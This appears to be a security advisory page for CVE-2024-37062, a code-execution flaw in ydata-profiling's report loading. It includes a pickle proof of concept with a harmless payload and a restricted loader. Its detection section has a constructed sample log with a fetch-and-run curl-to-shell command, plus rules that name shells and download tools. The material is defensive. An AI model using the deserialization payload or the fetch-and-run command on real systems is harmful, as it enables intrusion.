CVE-2024-37062
📋 TL;DR
This vulnerability in the ydata-profiling library allows remote code execution when a maliciously crafted saved report is loaded: the attacker's code runs with the privileges of the process that loads the report. Users of ydata-profiling 3.7.0 or newer who load profiling reports from untrusted sources are affected.
💻 Affected Systems
- ydata-profiling
⚠️ Manual Verification Required
This CVE does not have specific version information in our database, so automatic vulnerability detection cannot determine if your system is affected.
Why? The CVE database entry doesn't specify which versions are vulnerable (no version ranges provided by the vendor/NVD).
- Review the CVE details at NVD
- Check vendor security advisories for your specific version
- Test if the vulnerability is exploitable in your environment
- Consider updating to the latest version as a precaution
⚠️ Risk & Real-World Impact
Worst Case
Complete system compromise with attacker gaining full control over the affected system, data exfiltration, and lateral movement within the network.
Likely Case
Data theft, installation of malware or backdoors, and potential privilege escalation on the compromised system.
If Mitigated
Limited impact if untrusted reports are never loaded, or if loading happens only in a sandboxed, least-privilege process: at worst denial of service or exposure of whatever that sandbox can reach.
🎯 Exploit Status
Exploitation requires the victim to load a malicious profiling report, which could be delivered via phishing or compromised data sources.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: Check vendor advisory for specific patched version
Vendor Advisory: https://hiddenlayer.com/sai-security-advisory/ydata-june2024
Restart Required: No system reboot, but any running Python process that has already imported the old version keeps the vulnerable code until it is restarted.
Instructions:
1. Check current ydata-profiling version
2. Update to patched version via pip: pip install --upgrade ydata-profiling
3. Verify update with: pip show ydata-profiling
🔧 Temporary Workarounds
Restrict report sources
Only load profiling reports from trusted, verified sources
Input validation
Implement strict validation of profiling report files before processing
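The two points above (a crafted report executes code when loaded; validate and restrict what you load) are easier to reason about with the mechanism in front of you. The following is an added example, not ydata-profiling's own code: it shows the generic Python pattern in which loading a serialized report is a code-execution sink (the serializer calls whatever callable the object's __reduce__ names), and then a restricted loader that refuses every global not on an explicit allowlist, plus an HMAC wrapper so that reports your own pipeline saved can be told apart from tampered ones. The class and function names, the allowlist and the key are assumptions for illustration; the payload is a harmless marker command.

```python
"""Why loading an untrusted saved report is code execution, and a loader
that refuses it. Added example, not ydata-profiling's own code."""
import hashlib
import hmac
import io
import pickle
import subprocess
import sys


class MaliciousReport:
    """Stand-in for an attacker-crafted report object (constructed here).

    pickle serialises an object as "call this callable with these args"
    when __reduce__ says so, and pickle.loads performs that call.
    """

    def __reduce__(self):
        # Harmless stand-in payload: spawn a fresh interpreter that prints a
        # marker. An attacker substitutes any command or Python code.
        return (subprocess.check_output,
                ([sys.executable, "-c", "print('pwned')"],))


def craft_malicious_report() -> bytes:
    """The bytes an attacker ships as a 'saved report'."""
    return pickle.dumps(MaliciousReport())


def craft_benign_report() -> bytes:
    """A report made only of plain data types (constructed sample)."""
    return pickle.dumps({"n_rows": 1000, "columns": ["age", "income"],
                         "missing": {"age": 3, "income": 0}})


def load_report_unsafely(data: bytes):
    """The vulnerable pattern: pickle.loads on attacker-controlled bytes."""
    return pickle.loads(data)


class RestrictedUnpickler(pickle.Unpickler):
    """Resolves only an explicit allowlist of globals.

    Every other GLOBAL reference (subprocess.check_output, os.system, eval,
    ...) raises before any object is constructed, so a payload like the
    one above cannot run. Extend ALLOWED only with classes you have audited.
    """
    ALLOWED = {("builtins", "set"), ("builtins", "frozenset"),
               ("collections", "OrderedDict")}  # hypothetical allowlist

    def find_class(self, module, name):
        if (module, name) in self.ALLOWED:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"refusing global {module}.{name}")


def load_report_safely(data: bytes):
    return RestrictedUnpickler(io.BytesIO(data)).load()


def is_rejected(data: bytes) -> bool:
    """True when the restricted loader refuses the blob."""
    try:
        load_report_safely(data)
    except pickle.UnpicklingError:
        return True
    return False


# Integrity for reports you produce yourself: sign on save, verify before load.
# The key is a hypothetical secret held only by your own pipeline.
def sign_report(data: bytes, key: bytes) -> bytes:
    tag = hmac.new(key, data, hashlib.sha256).digest()
    return tag + data


def verify_and_load(blob: bytes, key: bytes):
    tag, data = blob[:32], blob[32:]
    expected = hmac.new(key, data, hashlib.sha256).digest()
    if not hmac.compare_digest(tag, expected):
        raise ValueError("report failed integrity check; refusing to load")
    return load_report_safely(data)


if __name__ == "__main__":
    evil = craft_malicious_report()
    print("unsafe loader returned:", load_report_unsafely(evil))  # payload ran
    print("restricted loader rejects it:", is_rejected(evil))
    key = b"hypothetical-pipeline-secret"
    print(verify_and_load(sign_report(craft_benign_report(), key), key))
```

Note the limits: a restricted unpickler can only load reports built from the allowlisted types, so it is a fit for plain-data exports, not a drop-in replacement for a library loader that pickles rich objects; and the HMAC only proves the blob came from a holder of your key, which is exactly the "trusted, verified source" requirement above made checkable. Neither replaces applying the vendor fix.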
🧯 If You Can't Patch
- Implement network segmentation to isolate systems using ydata-profiling
- Deploy application allowlisting to prevent execution of unauthorized code
🔍 How to Verify
Check if Vulnerable:
Check the installed version with: pip show ydata-profiling | grep Version
Any version 3.7.0 or newer is within the reported affected range if that system loads reports from untrusted sources.
Verify Fix Applied:
Confirm the installed version is one the vendor advisory lists as patched. A version below 3.7.0 is outside the reported affected range, but downgrading is a workaround, not a fix.
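For auditing many environments (virtualenvs, containers, CI images) a script beats reading pip output by hand. The following is an added example, not part of this page's original content or the vendor's tooling: it reads the installed distribution version via importlib.metadata and compares it against the 3.7.0 lower bound stated in the TL;DR. The threshold reflects only what this page reports; there is no patched-version upper bound here, so the script can say "within reported affected range", not "fixed".

```python
"""Version audit for ydata-profiling. Added example; the affected range
comes from this page's TL;DR (3.7.0 and newer), not from vendor version data."""
import re
from importlib import metadata

# Lower bound of the affected range reported on this page.
REPORTED_AFFECTED_FROM = (3, 7, 0)


def parse_version(text):
    """Leading numeric components only: '4.0.0rc1' -> (4, 0, 0), '3.7' -> (3, 7, 0)."""
    m = re.match(r"(\d+)(?:\.(\d+))?(?:\.(\d+))?", text.strip())
    if not m:
        raise ValueError(f"unparseable version: {text!r}")
    return tuple(int(p or 0) for p in m.groups())


def installed_version(dist="ydata-profiling"):
    """Installed version string, or None when the distribution is absent."""
    try:
        return metadata.version(dist)
    except metadata.PackageNotFoundError:
        return None


def in_reported_affected_range(version):
    return parse_version(version) >= REPORTED_AFFECTED_FROM


def audit(dist="ydata-profiling"):
    """One-line verdict suitable for collecting across hosts."""
    version = installed_version(dist)
    if version is None:
        return f"{dist}: not installed"
    if in_reported_affected_range(version):
        return (f"{dist} {version}: within reported affected range (>= 3.7.0); "
                "check the vendor advisory for a patched release")
    return f"{dist} {version}: below reported affected range"


if __name__ == "__main__":
    print(audit())
```

Run it with the interpreter of each environment you want audited (the check sees only that interpreter's site-packages), and treat "not installed" as a result worth recording too.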
📡 Detection & Monitoring
Log Indicators:
- Unusual process execution from ydata-profiling context
- Failed deserialization attempts
- Unexpected network connections from profiling processes
Network Indicators:
- Outbound connections to suspicious IPs after report processing
- Unusual data exfiltration patterns
SIEM Query:
process.name: "python" AND process.args: "ydata-profiling" AND event.action: "process_start"
Note: the query above only catches the command-line entry point. Code that imports the library looks like any other python process, so key on what that python process does next, for example:
process.parent.name: python* AND process.name: (sh OR bash OR curl OR wget OR nc) AND event.action: "process_start"
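The indicators above are the kind that get lost in a SIEM query when the shell is two process hops away from the python process that loaded the report. The following is an added example, not part of the original page: detection logic that walks process ancestry so a shell or download tool anywhere under a python process is flagged, and that flags python processes connecting to addresses outside the internal ranges. The log lines are constructed, ECS-style JSON; the field names, the tool lists and the internal address ranges are assumptions to adapt to your telemetry.

```python
"""Detection logic for the indicators above, run over constructed sample events.
Added example; the log lines are invented, ECS-style JSON, not real telemetry."""
import ipaddress
import json

SHELLS = {"sh", "bash", "dash", "zsh", "cmd.exe", "powershell.exe", "pwsh"}
NET_TOOLS = {"curl", "wget", "nc", "ncat", "socat", "ssh", "scp"}
# Hypothetical internal ranges; add your own allocations.
INTERNAL = [ipaddress.ip_network(n) for n in
            ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8")]

# Constructed sample log (not real telemetry): a python job loads a report,
# spawns a shell that fetches a script, and phones out; then unrelated noise.
SAMPLE_LOG = """
{"@timestamp":"2024-06-20T10:01:02Z","event":{"action":"process_start"},"process":{"name":"python3","pid":4101,"args":["python3","analyze.py","vendor_report.pkl"]}}
{"@timestamp":"2024-06-20T10:01:03Z","event":{"action":"process_start"},"process":{"name":"sh","pid":4102,"args":["sh","-c","curl -s http://203.0.113.9/s | sh"],"parent":{"name":"python3","pid":4101}}}
{"@timestamp":"2024-06-20T10:01:03Z","event":{"action":"process_start"},"process":{"name":"curl","pid":4103,"parent":{"name":"sh","pid":4102}}}
{"@timestamp":"2024-06-20T10:01:04Z","event":{"action":"network_connection"},"process":{"name":"python3","pid":4101},"destination":{"ip":"203.0.113.9","port":80}}
{"@timestamp":"2024-06-20T10:02:00Z","event":{"action":"network_connection"},"process":{"name":"python3","pid":4101},"destination":{"ip":"10.0.5.20","port":5432}}
{"@timestamp":"2024-06-20T10:03:00Z","event":{"action":"process_start"},"process":{"name":"git","pid":4200,"parent":{"name":"bash","pid":3000}}}
"""


def parse_events(log):
    return [json.loads(line) for line in log.strip().splitlines() if line.strip()]


def is_python(name):
    return bool(name) and name.lower().startswith("python")


def has_python_ancestor(pid, parent_of, max_depth=16):
    """Walk the recorded parent chain; True if any ancestor is a python process."""
    for _ in range(max_depth):
        entry = parent_of.get(pid)
        if entry is None:
            return False
        _, parent_name, parent_pid = entry
        if is_python(parent_name):
            return True
        if parent_pid is None:
            return False
        pid = parent_pid
    return False


def detect(events):
    """Return alerts for shells/download tools under python and external connections."""
    parent_of = {}  # pid -> (name, parent name, parent pid), built from process_start
    alerts = []
    for ev in events:
        proc = ev.get("process", {})
        action = ev.get("event", {}).get("action")
        if action == "process_start":
            parent = proc.get("parent", {})
            parent_of[proc["pid"]] = (proc.get("name"), parent.get("name"), parent.get("pid"))
            if proc.get("name") in SHELLS | NET_TOOLS and has_python_ancestor(proc["pid"], parent_of):
                alerts.append({"rule": "python_spawned_shell_or_net_tool",
                               "pid": proc["pid"], "name": proc.get("name"),
                               "time": ev.get("@timestamp")})
        elif action == "network_connection" and is_python(proc.get("name")):
            ip = ipaddress.ip_address(ev["destination"]["ip"])
            if not any(ip in net for net in INTERNAL):
                alerts.append({"rule": "python_external_connection",
                               "pid": proc["pid"], "destination": str(ip),
                               "time": ev.get("@timestamp")})
    return alerts


if __name__ == "__main__":
    for alert in detect(parse_events(SAMPLE_LOG)):
        print(alert)
```

The ancestry walk is what makes the curl process (child of sh, grandchild of python3) an alert rather than a miss; the git-under-bash line stays quiet because nothing above it is python. Tune the external-connection rule with your own egress allowlist, since data-science hosts legitimately pull packages and datasets.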